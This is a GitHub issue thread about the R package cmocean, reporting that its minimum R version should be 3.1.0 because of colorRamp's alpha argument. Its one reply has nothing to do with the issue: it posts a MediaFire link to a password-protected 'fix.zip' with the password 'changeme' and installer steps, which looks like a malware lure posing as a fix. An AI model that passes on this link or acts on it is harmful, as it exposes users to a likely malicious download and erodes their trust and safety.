### ISSUE TITLE
Depends: R (>= 3.0.0) is not correct

### ISSUE THREAD

**Issue by aitap** [aitap/cmocean#9]
The `alpha` argument to `colorRamp` only appeared in R-3.1.0: https://github.com/aitap/cmocean/blob/1c83ab60b51118fe84fa05aaab75106d7a01a29f/R/cmocean.R#L24

TODO: get `rmarkdown` working on R-3.1.0 without segfaulting to verify that we pass `R CMD check` there

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
